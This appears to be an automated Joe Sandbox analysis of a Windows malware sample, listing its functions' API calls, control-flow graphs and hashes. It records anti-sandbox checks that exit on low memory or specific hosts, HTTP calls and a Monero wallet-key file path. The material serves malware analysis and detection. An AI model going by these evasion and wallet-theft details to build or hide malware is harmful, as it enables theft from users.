                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E07F8), ref: 007499DE
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 007311D0: ExitProcess.KERNEL32 ref: 00731211
                        • Part of subcall function 00731160: GetSystemInfo.KERNEL32(?), ref: 0073116A
                        • Part of subcall function 00731160: ExitProcess.KERNEL32 ref: 0073117E
                        • Part of subcall function 00731110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0073112B
                        • Part of subcall function 00731110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00731132
                        • Part of subcall function 00731110: ExitProcess.KERNEL32 ref: 00731143
                        • Part of subcall function 00731220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0073123E
                        • Part of subcall function 00731220: __aulldiv.LIBCMT ref: 00731258
                        • Part of subcall function 00731220: __aulldiv.LIBCMT ref: 00731266
                        • Part of subcall function 00731220: ExitProcess.KERNEL32 ref: 00731294
                        • Part of subcall function 00746770: GetUserDefaultLangID.KERNEL32 ref: 00746774
                        • Part of subcall function 00731190: ExitProcess.KERNEL32 ref: 007311C6
                        • Part of subcall function 00747850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007311B7), ref: 00747880
                        • Part of subcall function 00747850: RtlAllocateHeap.NTDLL(00000000), ref: 00747887
                        • Part of subcall function 00747850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0074789F
                        • Part of subcall function 007478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00747910
                        • Part of subcall function 007478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00747917
                        • Part of subcall function 007478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0074792F
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013E8880,?,0075110C,?,00000000,?,00751110,?,00000000,00750AEF), ref: 00746ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00746AE8
                      • CloseHandle.KERNEL32(00000000), ref: 00746AF9
                      • Sleep.KERNEL32(00001770), ref: 00746B04
                      • CloseHandle.KERNEL32(?,00000000,?,013E8880,?,0075110C,?,00000000,?,00751110,?,00000000,00750AEF), ref: 00746B1A
                      • ExitProcess.KERNEL32 ref: 00746B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                      • String ID:
                      • API String ID: 2525456742-0
                      • Opcode ID: 799ce390292224180788967c2b99f277ce9a4cd2f72c1e1a84d2cf68fbcc6220
                      • Instruction ID: 3c962c896f51c683667334b0e0a514eb7053d6094ae2cee60751391bf8477403
                      • Opcode Fuzzy Hash: 799ce390292224180788967c2b99f277ce9a4cd2f72c1e1a84d2cf68fbcc6220
                      • Instruction Fuzzy Hash: F1312B71A54208FAEB05FBF0DC5ABFE7778AF44301F504528F612A2192DF786945C6A2
                      Function 00731220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1204 731220-731247 call 7489b0 GlobalMemoryStatusEx 1207 731273-73127a 1204->1207 1208 731249-731271 call 74da00 * 2 1204->1208 1209 731281-731285 1207->1209 1208->1209 1212 731287 1209->1212 1213 73129a-73129d 1209->1213 1215 731292-731294 ExitProcess 1212->1215 1216 731289-731290 1212->1216 1216->1213 1216->1215
                      APIs
                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0073123E
                      • __aulldiv.LIBCMT ref: 00731258
                      • __aulldiv.LIBCMT ref: 00731266
                      • ExitProcess.KERNEL32 ref: 00731294
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                      • String ID: @
                      • API String ID: 3404098578-2766056989
                      • Opcode ID: 0de3474a3a94c2950dfc23839dde7378338412f4c76bca19ada8c88e6b523c11
                      • Instruction ID: 09b175ffe8ae989d59285de05c75f9a5f4d4f98636c2d294dc9a01ef0cc37a9c
                      • Opcode Fuzzy Hash: 0de3474a3a94c2950dfc23839dde7378338412f4c76bca19ada8c88e6b523c11
                      • Instruction Fuzzy Hash: 05011DB0E44308FAEB10EFE4CC49BAEBB78BB54705F608048E705B62C2D77859458799
                      Function 00746AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1218 746af3 1219 746b0a 1218->1219 1221 746b0c-746b22 call 746920 call 745b10 CloseHandle ExitProcess 1219->1221 1222 746aba-746ad7 call 74aad0 OpenEventA 1219->1222 1227 746af5-746b04 CloseHandle Sleep 1222->1227 1228 746ad9-746af1 call 74aad0 CreateEventA 1222->1228 1227->1219 1228->1221
                      APIs
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013E8880,?,0075110C,?,00000000,?,00751110,?,00000000,00750AEF), ref: 00746ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00746AE8
                      • CloseHandle.KERNEL32(00000000), ref: 00746AF9
                      • Sleep.KERNEL32(00001770), ref: 00746B04
                      • CloseHandle.KERNEL32(?,00000000,?,013E8880,?,0075110C,?,00000000,?,00751110,?,00000000,00750AEF), ref: 00746B1A
                      • ExitProcess.KERNEL32 ref: 00746B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                      • String ID:
                      • API String ID: 941982115-0
                      • Opcode ID: f0c2ea975c7809312d4ecc0a99e1ed8b6f7c5707e7f3f29483020e1a5e624b55
                      • Instruction ID: c86c5ed664a4b292961808e48201069c8dd12d068c3612c546b36204b14078f6
                      • Opcode Fuzzy Hash: f0c2ea975c7809312d4ecc0a99e1ed8b6f7c5707e7f3f29483020e1a5e624b55
                      • Instruction Fuzzy Hash: 07F08CB0A44219EFE700BBA0DC0ABBE7B74FB05701F208914F517E11C1CBB85980EAA7
                      Function 007347B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00734839
                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00734849
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CrackInternetlstrlen
                      • String ID: <
                      • API String ID: 1274457161-4251816714
                      • Opcode ID: 3a175b66728ee72e08d7072871f6293edc1fd7cd42980b682a81dc5e8a75eb6c
                      • Instruction ID: 2200e5ba22b6d9a34b3ae86e21f42fcb8ea334f1d8e69eb0445efbb22f70398d
                      • Opcode Fuzzy Hash: 3a175b66728ee72e08d7072871f6293edc1fd7cd42980b682a81dc5e8a75eb6c
                      • Instruction Fuzzy Hash: 17216FB1D00208ABEF14DFA4EC49ADE7B75FB44320F108625F925A72D1EB706A09CF81
                      Function 007451F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                        • Part of subcall function 00736280: InternetOpenA.WININET(00750DFE,00000001,00000000,00000000,00000000), ref: 007362E1
                        • Part of subcall function 00736280: StrCmpCA.SHLWAPI(?,013EE290), ref: 00736303
                        • Part of subcall function 00736280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00736335
                        • Part of subcall function 00736280: HttpOpenRequestA.WININET(00000000,GET,?,013EDC28,00000000,00000000,00400100,00000000), ref: 00736385
                        • Part of subcall function 00736280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007363BF
                        • Part of subcall function 00736280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007363D1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00745228
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                      • String ID: ERROR$ERROR
                      • API String ID: 3287882509-2579291623
                      • Opcode ID: 941948efc345206a08c1cff89e998171204a1fd37d07f9437dc1ed2adf30b0b2
                      • Instruction ID: 55f0343d3ab0633f3c8879b8e0510179efe92ed3a876b5dff0e89ad16d8747e0
                      • Opcode Fuzzy Hash: 941948efc345206a08c1cff89e998171204a1fd37d07f9437dc1ed2adf30b0b2
                      • Instruction Fuzzy Hash: 50113070954108FBEB14FF60DD5AAED7378AF50300F808168F81A4B593EF78AB05CA92
                      Function 007478E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1275 7478e0-747937 GetProcessHeap RtlAllocateHeap GetComputerNameA 1276 747942-747945 1275->1276 1277 747939-74793e 1275->1277 1278 747962-747972 1276->1278 1277->1278
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00747910
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00747917
                      • GetComputerNameA.KERNEL32(?,00000104), ref: 0074792F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateComputerNameProcess
                      • String ID:
                      • API String ID: 1664310425-0
                      • Opcode ID: ee6799184f4c620852192f5ce842fb059cabfd293b4a98872a55dce56dbe9be5
                      • Instruction ID: 4bf99e4a2162ace0dee3c91cc3f3181fdbd530fd35d86be21e1fcf2fccb23127
                      • Opcode Fuzzy Hash: ee6799184f4c620852192f5ce842fb059cabfd293b4a98872a55dce56dbe9be5
                      • Instruction Fuzzy Hash: 6001A9B1A48204EFC714DF94DD45BAEBBB8F744B11F104259F945E3380D3785944CBA2
                      Function 00731110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0073112B
                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00731132
                      • ExitProcess.KERNEL32 ref: 00731143
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$AllocCurrentExitNumaVirtual
                      • String ID:
                      • API String ID: 1103761159-0
                      • Opcode ID: fda138dc8707a486fb32e22746b73f1118ac211c58c3760a706bf05db238c3a5
                      • Instruction ID: ea235291968408c753d9373cbc1c96bf51099d91a7eed52d787dfea0e9e7e105
                      • Opcode Fuzzy Hash: fda138dc8707a486fb32e22746b73f1118ac211c58c3760a706bf05db238c3a5
                      • Instruction Fuzzy Hash: 14E0867195930CFBE7106BA09C0EB4C7778AB44B02F500054F70C761C0D6B42640A69A
                      Function 007310A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007310B3
                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 007310F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Virtual$AllocFree
                      • String ID:
                      • API String ID: 2087232378-0
                      • Opcode ID: d625f88cb338b0e32b874752f0ca6a835f6f103f0e64fc7180995d2c56493058
                      • Instruction ID: c21fa98171918094cad8016ab14d074fa3b0d03eebcf23f4c5cd87ca699471cc
                      • Opcode Fuzzy Hash: d625f88cb338b0e32b874752f0ca6a835f6f103f0e64fc7180995d2c56493058
                      • Instruction Fuzzy Hash: 30F0E2B2641208FBE7189AA4AC49FAEB7ECE705B15F300448F504E7280D571AE40DAA1
                      Function 00731190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 007478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00747910
                        • Part of subcall function 007478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00747917
                        • Part of subcall function 007478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0074792F
                        • Part of subcall function 00747850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007311B7), ref: 00747880
                        • Part of subcall function 00747850: RtlAllocateHeap.NTDLL(00000000), ref: 00747887
                        • Part of subcall function 00747850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0074789F
                      • ExitProcess.KERNEL32 ref: 007311C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                      • String ID:
                      • API String ID: 3550813701-0
                      • Opcode ID: 29d404c84d5288b336439603b5cedf0540cbff16636f3dba6913340b9f982ed1
                      • Instruction ID: cc56c7f43beac40c48351313e904d24f80696370b8b7b40c6f2c10549534b698
                      • Opcode Fuzzy Hash: 29d404c84d5288b336439603b5cedf0540cbff16636f3dba6913340b9f982ed1
                      • Instruction Fuzzy Hash: 38E012B6A2830993DA0477B0EC0EB2E339C5B54746F440824FA09D2113FF6DE840D666

                      Non-executed Functions

                      Function 007438B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 007438CC
                      • FindFirstFileA.KERNEL32(?,?), ref: 007438E3
                      • lstrcat.KERNEL32(?,?), ref: 00743935
                      • StrCmpCA.SHLWAPI(?,00750F70), ref: 00743947
                      • StrCmpCA.SHLWAPI(?,00750F74), ref: 0074395D
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00743C67
                      • FindClose.KERNEL32(000000FF), ref: 00743C7C
                      Strings
